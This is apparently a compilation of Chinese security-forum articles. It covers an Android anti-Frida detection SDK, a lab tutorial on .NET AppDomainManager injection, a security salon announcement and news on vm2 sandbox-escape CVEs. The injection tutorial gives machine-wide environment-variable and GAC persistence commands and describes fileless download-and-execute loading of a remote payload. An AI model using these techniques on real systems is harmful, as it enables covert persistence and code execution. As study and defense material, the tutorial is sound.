ARM64 指令编码：每条 ARM64 指令固定 4 字节。LDR (literal)的高位 opcode 模式是0x18000000加各种修饰位。BR指令是0xD61F0000加寄存器编号（占低 5 位）。两个 mask 把变化位过滤掉，比较固定位就能识别指令类型。

扫每个可执行段开头：

size_tscan_trampoline_hits(const MapEntry &entry) {
#if defined(__aarch64__)
if (entry.end <= entry.start || entry.perms[0] != 'r' || entry.perms[2] != 'x') return 0;
size_t length = std::min<uintptr_t>(entry.end - entry.start, 4096);
if (length < sizeof(uint32_t) * 2) return 0;
auto *cursor = reinterpret_cast<constuint32_t *>(entry.start);
size_t count = length / sizeof(uint32_t);
size_t hits = 0;
for (size_t i = 0; i + 1 < count; ++i) {
if (is_arm64_ldr_literal(cursor[i]) && is_arm64_br(cursor[i + 1])) {
            ++hits;
        }
    }
return hits;
#else
return 0;
#endif
}

只扫前 4096 字节是个性能权衡。inline hook 的跳板永远在函数开头，深扫整个段就是浪费 CPU。

绕这层换其他跳板模式。比如MOVZ + MOVK + MOVK + MOVK + BR用四条MOVZ/MOVK拼出 64 位地址再跳。能用，但加一条规则的成本比攻击方换实现的成本低一个数量级——主动权在防守方。

痕迹三：SIGTRAP handler 探针

这条最有意思。native_hook_detector.cpp第 196 行：

boolrun_sigtrap_probe() {
struct sigaction action{};
struct sigaction old_action{};
    action.sa_sigaction = sigtrap_handler;
    action.sa_flags = SA_SIGINFO;
sigemptyset(&action.sa_mask);
if (sigaction(SIGTRAP, &action, &old_action) != 0) return true;
    g_sigtrap_seen = 0;
pid_t pid = getpid();
pid_t tid = static_cast<pid_t>(syscall(__NR_gettid));
syscall(__NR_tgkill, pid, tid, SIGTRAP);
sigaction(SIGTRAP, &old_action, nullptr);
return g_sigtrap_seen == 1;
}

代码自己注册一个 SIGTRAP handler，然后用tgkill给当前线程发一个 SIGTRAP，看 handler 收没收到（g_sigtrap_seen标志位）。如果 handler 没收到，说明信号路径被劫持了——通常是某个调试器或 hook 框架在接管 SIGTRAP。

原理：ptrace + 调试断点是用 SIGTRAP 实现的。调试器给目标进程下断点 = 把目标指令换成 BRK，被 ptrace 跟踪的进程触发 BRK 时内核会把 SIGTRAP 投递给 tracer 而不是 tracee，tracee 自己注册的 handler 就吃不到这个信号。

这是个"反推存在"：没法直接判断有没有被 ptrace，那就发个 SIGTRAP 给自己看自己接不接得到。接不到就有人在动信号路径。

第 5 层：自检——别去找 frida 在哪，看 frida 有没有动我

到第 4 层，前面所有招数都在主动找 Frida 在进程里的痕迹。还有一个完全不同的视角没用：别去找 frida 在哪，去看自己的关键方法有没有被 frida 动过。

detector/MethodIntegrityDetector.java：

@Override
protected DetectionResult detect() {
    List suspicious = new ArrayList<>();
    inspect(suspicious, RiskEngine.class, "collectSync");
    inspect(suspicious, RiskEngine.class, "getReportJson");
    inspect(suspicious, HookFrameworkDetector.class, "detect");
    inspect(suspicious, DebugDetector.class, "detect");
    inspect(suspicious, EmulatorDetector.class, "detect");
    inspect(suspicious, AndroidIdCollector.class, "collectViaSettingsApi", ...);
    inspect(suspicious, Debug.class, "isDebuggerConnected");
    inspect(suspicious, Settings.Secure.class, "getString",
            android.content.ContentResolver.class, String.class);
if (!suspicious.isEmpty()) {
return result(RiskLevel.HIGH, DetectionStatus.DANGER, 10, 10, false, ...);
    }
return safe();
}

挑出来盯的方法分四类：

SDK 自己的关键方法：collectSync、getReportJson，对应"采集入口"
其他检测器的入口：HookFrameworkDetector.detect、DebugDetector.detect、EmulatorDetector.detect，对应"兄弟检测器有没有被绑架"
数据采集入口：AndroidIdCollector.collectViaSettingsApi
系统级敏感方法：Debug.isDebuggerConnected、Settings.Secure.getString

挑这几个不是随便挑的，都是攻击者要"消灭风控"几乎必 hook 的目标。HookFrameworkDetector.detect自己就是 hook 检测的入口，攻击者要让 hook 检测不报，第一选择就是 hook 这个方法让它直接 return safe。把它做成"必经之路"，反过来 hook 它就一定会留下痕迹。

每个方法走一次inspect：

private void inspect(List<String> suspicious, Class owner, String name, Class... parameterTypes) {
String methodLabel = owner.getName() + "#" + name;
try {
Executable executable = owner.getDeclaredMethod(name, parameterTypes);
String result = NativeCollectorBridge.nativeInspectMethodEntryPoint(executable);
if (result == null || result.isEmpty()) return;
if (result.startsWith("suspicious:")) {
            suspicious.add(methodLabel + ":" + result.substring("suspicious:".length()));
        }
    } catch (...) {}
}

把 JavaExecutable对象（其实是 ART 内部 ArtMethod 的封装）传给 native，native 端通过 ART 的 ArtMethod 内存布局找到这个方法的"快速编译入口指针"（entry_point_from_quick_compiled_code），看这个指针指向的内存段是合法系统区域还是被劫持过的可疑区域。

native_hook_detector.cpp第 290 行native_inspect_method_entry_point：

constexpr size_t kProbeBytes = 64;
constexpr size_t kWordSize = sizeof(uintptr_t);
size_t readable_bytes = ...;
size_t probe_bytes = std::min(kProbeBytes, readable_bytes);
for (size_t offset = 0; offset + kWordSize <= probe_bytes; offset += kWordSize) {
auto *slot = reinterpret_cast<constuintptr_t *>(art_method + offset);
uintptr_t candidate_address = *slot;
if (candidate_address < 4096) continue;
const MapEntry *region = find_region(regions, candidate_address);
if (region == nullptr || !is_executable_region(*region)) continue;
// ... 收集候选
}

这块的实现思路很务实：ArtMethod 在不同 Android 版本上字段偏移会变（11、12、13、14 都不一样），与其精确匹配某个版本，不如把 ArtMethod 头部 64 字节都扫一遍，挑里面指向可执行内存段的指针作为候选，取偏移最大的那个（一般是入口指针的位置）。然后看这个指针落在哪个内存段：

if (is_suspicious_method_region(chosen->region) || !is_allowed_method_region(chosen->region)) {
return "suspicious:" + summary.str();
}
return "ok:" + summary.str();

落在frida/gadget/xposed/substrate之类的段、或者落在不被允许的段（合法 ART 区是libart、/apex/、/system/、.oat、.odex、memfd:jit、/data/app/等），都算 suspicious。

这一招的核心威慑力：哪怕攻击者把 Frida 包装得连匿名内存都没了、连协议都改了、连进程名都伪装得和系统进程一样，只要它真的劫持了关键方法，那个方法的入口指针一定指向 Frida 的内存段。

绕这一层有两个思路，但都自相矛盾：

不去 hook 这几个方法——但 Frida 的目的就是为了 hook，关键方法本身就是 hook 检测的入口（HookFrameworkDetector.detect），不 hook 它就拿不到任何成果
hook 完之后还把读字节的接口也 hook 掉让它返回原始字节——但这又落入"多源验证"陷阱：JNI 路径、syscall 路径、ArtMethod 内存指针，全都得同步劫持

到这一层，攻防进入"你绕一招我加一招"的纯阵地战。

最后还有RiskReport.java第 100 行的兜底逻辑：

private boolean hasHardTrigger() {
for (DetectionResult detection : detections) {
if (detection.getRiskLevel().getValue() < RiskLevel.HIGH.getValue()) continue;
String name = detection.getDetectorName();
List<String> details = detection.getDetails();
if ("hook_framework".equals(name) && containsAny(details,
"dbus_reject", "frida_pid_port", "anon_exec", "trampoline", "sigtrap")) {
return true;
        }
if ("method_integrity".equals(name)) {
return true;
        }
    }
return false;
}

method_integrity命中任何一项 → 直接 DEADLY，不管别的检测打了多少分。这是把"自检"放到 SDK 决策的至高位。

第 6 层：信号分级 + 多招组合

到这里所有招式都讲完了，最后讲怎么把它们组合起来出一个判定。

回到HookFrameworkDetector.java：

private staticfinal class SignalScore {
private int strong;
private int medium;
private int weak;
}

每条规则按强弱给信号打标，加到SignalScore：

strong：内存层痕迹（anon_exec、trampoline、sigtrap）、协议握手（dbus_reject）、进程关联（frida_pid_port）、Xposed 实际激活的 hook 数量
medium：线程名、Xposed 类被加载、栈痕迹、默认端口连得上
weak：其他弱信号（一般是 native 层那些不太确定的字符串）

最后按累加值判级：

if (score.strong >= 2 || (score.strong >= 1 && score.medium >= 2)) {
    return result(RiskLevel.DEADLY, ..., 10, 10, ...);
}
if (score.strong >= 1 || score.medium >= 2) {
    return result(RiskLevel.HIGH, ..., 8, 10, ...);
}
return result(RiskLevel.MEDIUM, ..., 4, 10, ...);

之所以这么搞，是因为每一档单独看都可以被绕。线程名能改、端口能换、字符串能 mv、连 anon_exec 都有偏门姿势能伪装。但要强迫攻击者同时在所有维度全部绕过——改名 + 改端口 + 改协议 + 不留匿名内存 + 不动方法入口 + 不被 SIGTRAP 探针发现 + 4 路 Android ID 数据始终一致——这个工程量已经超过"重新写一个 Frida"。

写一条 99% 准确的规则比写十条 90% 准确的规则更难。十条 90% 的规则做投票反而稳。这是做风控这些年最朴素的一条经验。

顺便聊聊其他几个检测器

Frida 那块是最重的，剩下几个检测器思路一样，简单扫过。

detector/RootDetector.java用su二进制路径列表 + Magisk 路径 +getenforce看 SELinux 是不是 Permissive + native 端的 root 检测组合。重点是把/data/adb/magisk这类模块化 root的特征单独检测了，老的 root 脚本通常只盯/system/bin/su，会漏。

detector/EmulatorDetector.java是个证据累积型设计：传感器数量太少、传感器厂商写着 AOSP、热区为空、缺蓝牙摄像头闪光特性、网卡 IP 是10.0.2.15（QEMU 默认网关）等十几条特征，累积到 3 条以上才升级风险等级。"3 条以上"这个阈值是控误报的关键——单个特征都有概率出现在物理设备上，比如低端机传感器确实少。

detector/DebugDetector.java主要靠TracerPid字段（在/proc/self/status里），同时用 native 的 ptrace 探测、ADB 端口探测、IDA 默认调试端口 23946、maps 里的gdbserver/lldb/android_server等做交叉验证。

detector/MountAnalysisDetector.java直接读/proc/mounts和/proc/self/mountinfo，找magisk字串和tmpfs /system这种"内存覆盖系统分区"的痕迹。Magisk 类的模块化 root 必须用 tmpfs 挂载覆盖系统分区，这个行为在挂载表里改不掉——内核生成的视图。这是非常稳的一条规则。

每个检测器拉出来都是同一套思路：多个独立特征、信号分级、组合判定、native 层兜底。

工程实践中的细节

注册表插件化。detector/DetectorRegistry.java和collector/CollectorRegistry.java都是简单的构造函数里add(new XxxDetector(context))。要扩展新检测，新建一个类继承BaseDetector，在 Registry 里加一行就行，主流程一行不用改。

任务并发与超时。core/TaskScheduler.java用ExecutorService + Future把所有 collector 和 detector 并行跑，统一超时（默认 15 秒）。任意单个任务挂了不影响其他任务的结果。脚本思维容易写出"按顺序执行 N 个检测、第 5 个卡住整个进程都回不来"这种代码，并发 + 超时是 SDK 化的硬门槛。

Native 边界。detector/DebugDetector.java第 60 行起，先调NativeCollectorBridge.nativeGetTracerPid()，失败才 fallback 到 Java 读/proc/self/status。这个"native 优先、Java 兜底"模式贯穿所有检测器：能下沉的尽量下沉到 C++，因为 native 层加上前面说的 raw syscall，攻击表面要小一档。

写在最后

代码仓库地址：https://github.com/WsttXm/RiskEngine。

Releases中有编译好的APK和aar，欢迎体验、欢迎提Issue 和 PR。

致谢

看雪ID：WsttXm

*本文为看雪论坛优秀文章，由 WsttXm原创，转载请注明来自看雪社区

第十届安全开发者峰会【议题征集】-欢迎投稿

# 往期推荐

球分享

球点赞

球在看

点击阅读原文查看更多

https://3gstudent.github.io/Use-AppDomainManager-to-maintain-persistence

AppDomainManager 注入：从GAC 利用到无文件加载的多种实现

Thu, 07 May 2026 18:06:00 +0800

ZyOrca 2026-05-07 18:06 上海

看雪论坛作者ID：ZyOrca

一、原理

过去的注入技术（如跨进程注入）依赖底层的 Windows API（如 VirtualAllocEx、WriteProcessMemory、CreateRemoteThread），这些 API 目前已被 EDR和杀毒软件严密监控。传统的 dll 劫持则需要依靠文件路径、容易被 DLL 签名校验发现，也容易存在重名文件导致劫持失败。

AppDomainManager 注入（本文讨论基于.NET Framework 4.x环境）则避免使用敏感 API，转向利用 .NET 原生框架（如运行时）的合法功能，而且通过设置全局环境变量，可实现对符合条件的.NET 程序启动即感染。其核心思路是：攻击者编写一个恶意的 C# 类，继承自官方的 System.AppDomainManager，然后通过修改配置文件或环境变量，欺骗一个合法的、有签名的 .NET 程序在启动时将这个恶意类作为其“AppDomainManager”加载。

当编写并编译一个 .NET 程序（如 C# 或 VB.NET）时，它并不会直接变成计算机 CPU 能听懂的机器码（0101），而是变成一种中间语言（MSIL/CIL）。.NET 运行时的任务就是负责把这些中间代码翻译成机器码，并全程管理程序运行时的各种需求，特别是内存管理需求。在 .NET 中，为了防止内存泄漏，运行时会自动追踪不再使用的对象并回收内存；而不是像 C++ ，开发者必须手动申请和释放内存。在 Windows 平台上，它最核心的部分被称为 CLR (Common Language Runtime，公共语言运行时)。

AppDomainManager 注入技术是安全专家 Casey Smith 在 2017 年首次提出。与传统的 DLL 劫持（DLL Side-Loading）不同，这利用的是 .NET 自身正常的程序集解析和加载机制，行为更加隐蔽，安全软件很难在不影响正常业务的前提下进行拦截。换句话说，AppDomainManager 注入的核心价值在于利用“受信任的微软签名程序”来加载“不受信任的代码”，属于 LOLBins (Living Off The Land Binaries) 。

AppDomain（应用程序域）：在 .NET 框架中，AppDomain 是进程内的一个轻量级隔离边界。一个操作系统进程（PID）可以包含多个 AppDomain。这种机制使得 .NET 程序可以安全地加载和卸载程序集（Assembly），防止不同的代码段互相干扰。
AppDomainManager：这是一个官方提供的基类，用于让宿主（Host）自定义如何创建和管理新的 AppDomain。当一个 .NET 应用程序启动并初始化它的第一个 AppDomain 时，它会检查是否配置了自定义的 AppDomainManager。如果有，.NET 运行时会优先加载并执行这个管理器代码

AppDomainManager 不依赖于文件缺失，也不需要复杂的远程线程注入。它利用的是 CLR 加载机制中的“配置优先”原则，代码运行环境极其“纯净”且受信任。AppDomainManager 允许代码在目标程序的 Main 函数执行之前就获得控制权。这意味着攻击者可以在安全软件还没来得及挂钩（Hook）或初始化监控之前，就已经完成了反调试、反沙箱或内存补丁等恶意操作。

CLR启动 → 创建默认AppDomain → 加载AppDomainManager → 调用InitializeNewDomain → 用户Main

以下测试均基于.NET Framework 4.x，虽然 .NET Core 及更高版本（.NET 5/6/7/8）也支持 AppDomainManager，但其加载机制（如 app.config 的处理方式）和 GAC 的概念已经发生了巨大变化。

二、修改配置文件实现注入

2.1 测试 dll

使用 C# 创建一个类库（DLL），包含一个继承自 AppDomainManager 的类，并重写 InitializeNewDomain 方法。在该方法中放入恶意代码。具体编译过程：新建一个文件 MyPayload.cs，使用记事本输入以下 C# 代码。这段代码继承了 AppDomainManager，重写了InitializeNewDomain()，实现在.NET 程序初始化时启动计算器。

打开命令提示符（cmd），进入 MyPayload.cs 文件所在目录，利用系统自带的 .NET 编译器 (csc.exe) 将源码编译为 AppVStreamingUX_Multi_User.dll。运行以下命令：

2.2 目标 .NET 应用程序

选择 .NET 框架自带的合法且有微软签名的程序 dfsvc.exe 作为启动测试 dll 的目标程序，将其复制到AppVStreamingUX_Multi_User.dll 所在目录，并重命名为AppVStreamingUX.exe，稍微伪装一下。

dfsvc.exe (Deployment File Service) 是 Microsoft .NET Framework 的一部分，主要负责 ClickOnce 应用程序的安装、更新和管理。它是合法的 Windows 系统进程，通常随 .NET Framework 运行。虽然它是正常的部署服务，但也可能被滥用为执行恶意代码的白名单程序。

不过，安全软件可能会校验文件名与签名中的原始文件名是否匹配，如果不匹配，反而会增加风险。这里仅仅做个测试，就先不管这么多了。

2.3 .config 配置文件

在目标 .NET 程序AppVStreamingUX.exe（原名为dfsvc.exe ）同目录下创建一个名为（目标程序名).exe.config 的文件。在配置文件中指定恶意 DLL (AppVStreamingUX_Multi_User.dll）和类名（MyAppDomainManager）。

当受害者或攻击者运行该合法 exe（ AppVStreamingUX.exe）时，.NET 运行时会自动读取 .config 文件（AppVStreamingUX.exe.config），并静默加载 AppVStreamingUX_Multi_User.dll 执行其中的恶意代码（弹出计算器）。

将以下 XML 内容写入该文件：

2.4 运行效果

点击运行程序AppVStreamingUX.exe，计算器顺利弹出：

通过火绒剑可以观察到AppVStreamingUX.exe 进程创建后，很快就打开并读取了配置文件AppVStreamingUX.exe.config

接着又打开了文件 AppVStreamingUX_Multi_User.dll

可以清楚地看到，这个AppVStreamingUX.exe 加载了 AppVStreamingUX_Multi_User.dll。

这次测试成功实现了利用配置文件的 AppDomainManager 注入。

需要注意的是，若以下任一条件不满足，CLR 将抛出异常并终止启动：

Assembly 无法解析
Type 不存在或不继承 AppDomainManager
强名称或版本不匹配

三、修改环境变量实现注入

3.1 全局环境变量设置

编译新的 dll：

运行命令，将以上代码编译为 GlobalManager.dll：

管理员权限打开 Powershell，依次执行以下命令：

接着把 dll 文件放到文件夹C:\test，然后设置环境变量：

点击运行AppVStreamingUX.exe，创建了 success.txt 文档，说明注入成功。

注意，.NET Core 和 .NET 5+ 之后，环境变量的前缀从 COMPLUS_ 变更为 DOTNET_（例如 DOTNET_AppDomainManagerAsm）

3.2 环境变量设置+路径加载

将GlobalManager.dll放进 .NET Framework 的核心目录里，例如C:\Windows\Microsoft.NET\Framework64\v4.0.30319，该路径下有几个常用的.NET 程序，例如MSBuild 和RegAsm。

和之前的环境变量设置方法有点不同，由于 DLL 就在路径里，不再需要版本号、Token 等复杂信息。

设置好环境变量之后，可以看一下注册表HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment 验证一下。

环境变量的设置确实生效了，然后点击RegAsm.exe，通过火绒剑看到RegAsm.exe 打开了GlobalManager.dll，并执行了这个 dll 创建了success.txt 文档。

这与 DLL 劫持不同的是，这个是“一对多”的关系，即不仅是RegAsm.exe，此文件夹下的其他很多程序在运行时都会加载这个 dll。

四、利用 GAC 实现注入

利用 GAC 实现 AppDomainManager 注入，是指通过将具备强签名的恶意 DLL 植入受信任的系统GAC（全局程序集缓存），并配置特定的环境变量，可迫使 CLR 在启动任意 .NET 进程时，优先从 GAC 加载该恶意类并实例化为 AppDomainManager。此过程无需篡改合法宿主文件，即可在主程序代码执行前静默劫持控制流，实现高隐蔽、全局性的系统级权限驻留。

全局程序集缓存 (Global Assembly Cache, GAC) 是 .NET Framework 中的一个专用、系统范围的中央存储库，用于存储被多个应用共享的“强名称程序集”。它能解决版本冲突，节省磁盘空间，并支持强名称和数字签名验证。GAC 主要存在于 .NET Framework 环境中（例如 C:\Windows\assembly），在 .NET Core 及后续版本中已被弃用

有分析报告显示，在国内比较猖獗的银狐木马曾在攻击中使用这种技术。

4.1 编译生成 DLL

打开 Visual Studio，新建一个 “类库 (.NET Framework)”，注意.NET 的版本，要与虚拟机中的.NET 版本保持一致，否则可能无法成功实现注入。

右键点击项目名 GacInjectTest -> 属性 (Properties)
在左侧找到“签名 (Signing)” 选项卡，勾选 “为程序集签名”
在下拉框中选择 “<新建...>”
随便起个密钥文件名，比如 key，取消勾选“使用密码保护我的密钥文件”，点击确定。

然后编译生成文件GacInjectTest.dll：

GAC（全局程序集缓存）里面的 DLL 会被全系统所有的 .NET 程序共享调用。GAC提供全局程序集解析能力，但代码执行权限仍取决于宿主进程安全上下文。写入 GAC 通常需要管理员权限，GAC 影响的是“加载路径”，不是“权限提升”。在 Visual Studio 里做的这个“新建签名”操作，本质上就是利用非对称加密算法（RSA），给 DLL 盖上了一个独一无二的“加密防伪钢印”，这个在 .NET 术语中就叫 “强名称（Strong Name）”。

全世界可能有成千上万个程序员都写了一个名叫 Utils.dll 的文件。如果都塞进 GAC 里，系统就彻底乱套了。给程序集签名后，系统识别这个 DLL 就不再只看名字了，而是看它的 “四元组身份”：文件名 + 版本号 + 语言文化 + 公钥标记 (PublicKeyToken)。

4.2 将 dll 注册到 GAC

将 dll 注册到系统的 GAC 中，方便所有的 .NET 程序共享调用，可以通过在 Powershell 执行以下命令实现注册：

注册完成之后，执行以下命令获取一下已注册 dll 的“四元组身份”：文件名 + 版本号 + 语言文化 + 公钥标记 (PublicKeyToken)，方便后续的环境变量设置。

$assembly = [System.Reflection.Assembly]::ReflectionOnlyLoadFrom("C:\Demo\GacInjectTest.dll")
$assembly.FullName

获取的文件“四元组身份”：GacInjectTest, Version=1.0.0.0, Culture=neutral, PublicKeyToken=9416298015f19395

在 .NET 程序集的强名称中，Culture 指的是该程序集所包含的区域性（语言和区域）资源，它决定了程序集是主程序集还是附属（卫星）程序集。

Culture=neutral ：neutral（非特定区域）表示该程序集不包含任何特定语言或区域的资源，它属于默认程序集（主程序集）。这类程序集通常包含代码逻辑和默认语言（通常是英语）的资源（或资源作为后备）。

如果一个程序集的 Culture 不是 neutral，比如 Culture=zh-CN 或 Culture=fr-FR，它就是一个卫星程序集，里面只包含语言特定的资源（如翻译后的字符串、图片），不包含代码。它会被放在 GAC 的特定子目录（或应用程序的 zh-CN\ 等子文件夹）中，由 .NET 根据当前线程的 CurrentUICulture 自动加载。

检查看看 dll 在 GAC 的注册是否成功，看一下文件夹路径 C:\Windows\Microsoft.NET\assembly\GAC_MSIL\，找到了以 dll 名称命名的文件夹，这个文件夹会有一个名字很长的子文件夹，格式是这样的：v4.0_1.0.0.0__9416298015f19395 （包含了版本号和PublicKeyToken），再进入这个长名字文件夹，会看到GacInjectTest.dll，说明注册成功。

4.3 设置环境变量

# 开启开发者模式
[Environment]::SetEnvironmentVariable("COMPlus_DevelopmentMode", "1", "Machine")  
# 定义 DLL 的信息 
$asmName = "GacInjectTest, Version=1.0.0.0, Culture=neutral, PublicKeyToken=9416298015f19395"
$typeName = "GacInjectTest.MyManager"
# 设置系统级环境变量
[Environment]::SetEnvironmentVariable("APPDOMAIN_MANAGER_ASM", $asmName, "Machine")
[Environment]::SetEnvironmentVariable("APPDOMAIN_MANAGER_TYPE", $typeName, "Machine")
[Environment]::SetEnvironmentVariable("DEVPATH", "C:\Demo", "Machine")

4.4 运行效果

点击运行 x64 的 RegAsm.exe，计算器顺利弹出。注意此时RegAsm.exe 都不在同一个文件夹，这说明通过利用 GAC ，AppDomainManager 注入无需依赖文件路径了，任意文件路径的.NET 程序运行时都会优先加载这个 dll。

五、AppDomainManager 注入结合无文件的内存执行

在稍微复杂一点的攻击中，攻击者极其讨厌在磁盘上留下多余的文件（比如 .config 和 dll 文件太显眼了），这容易被安全软件发现。AppDomainManager 注入结合无文件的内存执行要隐蔽得多，最终的恶意载荷可以在内存中执行，常见的攻击步骤大致如下：

网络拉取：通过 HTTP 请求将远程服务器上的可执行文件（.exe 或 .dll）作为纯字节流（Byte Array）下载到内存中。
反射加载：利用 .NET 的反射（Reflection）机制，直接将内存中的字节流解析并加载为当前进程中的一个程序集（Assembly）。
动态调用：找到该程序集的入口点（通常是 Main 函数），并直接在当前进程的内存空间中执行它。

接下来就逐步复现一下这个“AppDomainManager 注入 + 无文件的内存执行”

5.1 网络设置

查看一下主机虚拟网卡VMnet1 的 IP 地址为 192.168.148.1，将虚拟机的网络适配器设置为“仅主机”（Host-Only），关闭物理机的网络防火墙，发现虚拟机可以 ping 通物理机了，就可以继续接下来的试验了。

5.2 准备 Payload.exe

创建一个文本文件 Payload.cs，写入以下代码，编译生成成Payload.exe：

5.3 开启物理机 80 端口

在物理机Payload.exe 所在文件夹内打开命令行（CMD/PowerShell），执行命令python -m http.server 80，启动 Python 简易服务器。

在虚拟机浏览器的地址栏中输入192.168.148.1/Payload.exe，能下载Payload.exe，说明这个简易的服务器能下载成功。

5.4 准备注入的 dll

5.4.1 .NET 反射（Reflection）机制

反射是.NET中的一项技术，允许程序在运行时动态地访问和操作程序集、类型和对象的信息。通过反射，能够在编译时进行动态加载程序集、创建对象实例、调用对象方法、访问属性和字段等操作。

5.4.2 DownloadData()

这个函数与 DownloadFile 不同。DownloadFile 会强制要求提供一个本地磁盘路径，而 DownloadData 会将远程文件下载并直接返回为一个字节数组（byte[]）。下载的恶意程序 Payload.exe 只是内存中的一串二进制 01 码，没有触发“创建文件”的行为，这样也可以直接在内存中通过Assembly.Load加载。

5.4.3 Load()

通常情况下，程序加载 DLL 或 EXE 是通过磁盘路径（如 LoadLibrary("C:\test.dll")）。Assembly.Load 允许 CLR（公共语言运行时）把DownloadData 下载到内存中的字节数组byte[] 解析为一个可执行的 .NET Assembly 对象，挂载到当前的应用程序域中。

（Assembly.Load(byte[]) 虽然不产生文件，但会在 ETW（Windows 事件跟踪）中留下痕迹。现在的 EDR 已经可以通过监控 CLR 内部事件，例如 ETW 事件中的 AssemblyLoad，来捕捉到这种内存加载行为）。

5.4.4 执行

EntryPoint：自动在内存中寻找该Assembly （程序集）的 Main 或 WinMain 函数入口。
Invoke：正式下令 CPU 开始执行这段内存中的代码。

这两个函数意味着，不需要手动去寻找复杂的内存偏移地址，.NET 反射机制完成了所有定位工作，使得攻击载荷（Payload）的执行非常稳定。

5.5 注入实现

将 InjectObj.dll 拷贝到虚拟机，例如 C:\Demo\ 文件夹，在虚拟机设置环境变量

还是点击AppVStreamingUX.exe，Payload.exe 成功执行：

WireShark 可以看到点击AppVStreamingUX.exe 后，与地址 192.168.18.1 产生的链接和下载文件Payload.exe 的数据包。

当然了，魔高一尺，道高一丈。现在包括 EDR 在内的安全软件对AppDomainManager 注入的各种操作也提高了警惕。

DEVPATH 方式需要修改机器范围的 .config 文件（machine.config）或者设置 developmentMode。在目前 Windows 安全策略下，修改这些全局配置通常需要高权限，容易被监控。APPDOMAIN_MANAGER_ASM 和 APPDOMAIN_MANAGER_TYPE 的设置，对 .exe.config 文件的异常写入（尤其是往系统自带的 dfsvc.exe 等白名单程序目录下写配置），AppVStreamingUX.exe 加载一个不在常规路径下的 DLL（如 C:\test\GlobalManager.dll），这都很有可能触发安全软件告警。

该技术属于基于 CLR 合法扩展机制的执行劫持方法，在 .NET Framework 4.x 环境下具备较强隐蔽性，但其适用范围受运行时版本、加载上下文及安全策略限制，不能视为通用注入手段。

六、参考链接

Use AppDomainManager to maintain persistence

全局程序集缓存

https://learn.microsoft.com/zh-cn/dotnet/framework/app-domains/gac

360数字安全集团

https://360.net/about/news/article68b6585caf798600208d6410

《.NET安全攻防指南（上册）》第二章，作者：李寅、莫书棋，机械工业出版社

看雪ID：ZyOrca

https://bbs.kanxue.com/user-home-944427.htm

*本文为看雪论坛精华文章，由 ZyOrca原创，转载请注明来自看雪社区

第十届安全开发者峰会【议题征集】-欢迎投稿

# 往期推荐

球分享

球点赞

球在看

点击阅读原文查看更多

先知安全沙龙 - 北京站 5月15日开启！

Thu, 07 May 2026 18:06:00 +0800

阿里安全响应中心 2026-05-07 18:06 上海

5月15日，我们北京见，欢迎报名！

阿里云先知灯塔系列城市安全沙龙第十四场-北京站将于5月15日在北邮科技大厦4楼多功能厅举办。

本次沙龙在中国互联网协会网络与信息安全工作委员会的指导下，由阿里云先知平台、阿里安全响应中心、北京邮电大学网络空间安全学院、北京理工大学网络空间安全学院、北京航空航天大学网络空间安全学院、北京邮电大学天枢信息安全协会、北京理工大学BITs2Sys战队、北京航空航天大学or4nge战队、北京航空航天大学赛博安全协会联合举办，邀请北京多所高校网络安全相关专业师生和多名网络安全行业大咖、社会精英白帽子，旨在为学生和网络安全从业者提供面对面交流的机会，是一次纯粹的技术交流和分享！

除了干货满满的议题分享，我们还为每一位到场的、热爱安全技术的同学和白帽们准备了一份惊喜好礼。以礼会友，共享技术盛宴，在思维碰撞与灵感交流中深化对网络安全的理解与实践。期待大家在沙龙轻松愉快的氛围中收获知识、友好交流！如有意向参加可加入钉钉群了解活动详情，“先知安全沙龙·北京站2026”群的钉钉群号： 183205004779。

为保障学生出行安全，北京邮电大学、北京理工大学、北京航空航天大学我们会安排巴士往返免费接送，其他报名人数较多的院校我们也会安排巴士往返免费接送，具体接驳地址会在钉钉群内发布，欢迎同学们组队报名。

5月14日（沙龙活动前一天）钉钉群将内发布一道CTF题，仅限报名北京场先知安全沙龙的高校学生参与，成功获取flag将获得礼品一份，欢迎同学们进群挑战！

5月15日，我们北京见～

转发抽奖

关注阿里安全响应中心公众号

公开转发本文至朋友圈即可参与抽奖

攻击者可执行任意代码！vm2 沙箱库曝12连杀漏洞

Thu, 07 May 2026 18:06:00 +0800

看雪学苑 2026-05-07 18:06 上海

所有旧版均受影响，速升 3.11.2 堵死逃逸通道。

近日，广泛使用的 Node.js 沙箱环境库 vm2 被安全研究人员接连揪出 12 个严重漏洞，编号从 CVE-2026-24118 到 CVE-2026-44009，绝大多数评分高达 9.8 甚至满分 10.0。这些漏洞的共同后果极为危险：攻击者能够突破沙箱限制，在宿主机上执行任意代码，相当于完全接管服务器。

vm2 的设计初衷，是让开发者安全地运行不受信任的 JavaScript 代码，通过拦截和代理对象来隔离沙箱内外。但这一系列新漏洞表明，想彻底锁死逃逸路径远比预想的困难。其中有几个漏洞的利用手法相当“精巧”——有的借助 __lookupGetter__，有的滥用 Promise 对象的 species 属性，有的通过 inspect 函数或 SuppressedError，还有的利用符号到字符串强制转换触发的 TypeError 绕过保护。更严重的是，部分漏洞甚至能直接获取宿主的 Object 对象，或者让本应被屏蔽的 child_process 等模块重新可用，进而执行系统命令。

最受关注的满分漏洞 CVE-2026-43997 与 CVE-2026-44005，分别实现了代码注入和原型污染，让沙箱防护形同虚设。而 CVE-2026-44007 虽是稍低一些的 9.1 分，却能让攻击者在宿主机上执行任意操作系统命令。这些漏洞的覆盖范围极广，从 3.9.6 版本一路影响到最新补丁前的 3.11.1。

维护者 Patrik Šimek 在此前已紧急修复过一个关键逃逸漏洞 CVE-2026-22709，但显然新的绕过方法很快就又被挖掘出来。Šimek 也曾坦言，未来很可能还会发现更多逃逸手法。事实上，此次披露的漏洞中就不乏针对旧补丁的“补丁绕过”，例如 CVE-2026-24120 就是 CVE-2023-37466 的变种。

目前，所有已公布的漏洞均已修复。按照影响版本与修复版本的对应关系，用户只要将 vm2 升级至最新的 3.11.2 版本，即可一次性堵住全部 12 个漏洞的利用路径。对于仍依赖沙箱执行不可信代码的生产环境而言，延迟更新无异于将服务器大门向攻击者敞开。

受影响版本与修复版本速览：

低于 3.10.5 的版本：需应对 CVE-2026-24120、CVE-2026-24781、CVE-2026-26956 等
3.10.5 及以下：面临 CVE-2026-43997、CVE-2026-43999、CVE-2026-44005、CVE-2026-44006 等满分/高分漏洞
3.11.0 及 3.11.1：需立即升级至 3.11.2，修复 CVE-2026-44007、CVE-2026-44008、CVE-2026-44009

面对沙箱逃逸层出不穷的现状，安全专家建议除了保持库版本最新外，还应尽量在额外的系统级隔离环境中运行不受信任的代码，切勿仅依赖单一沙箱作为安全边界。

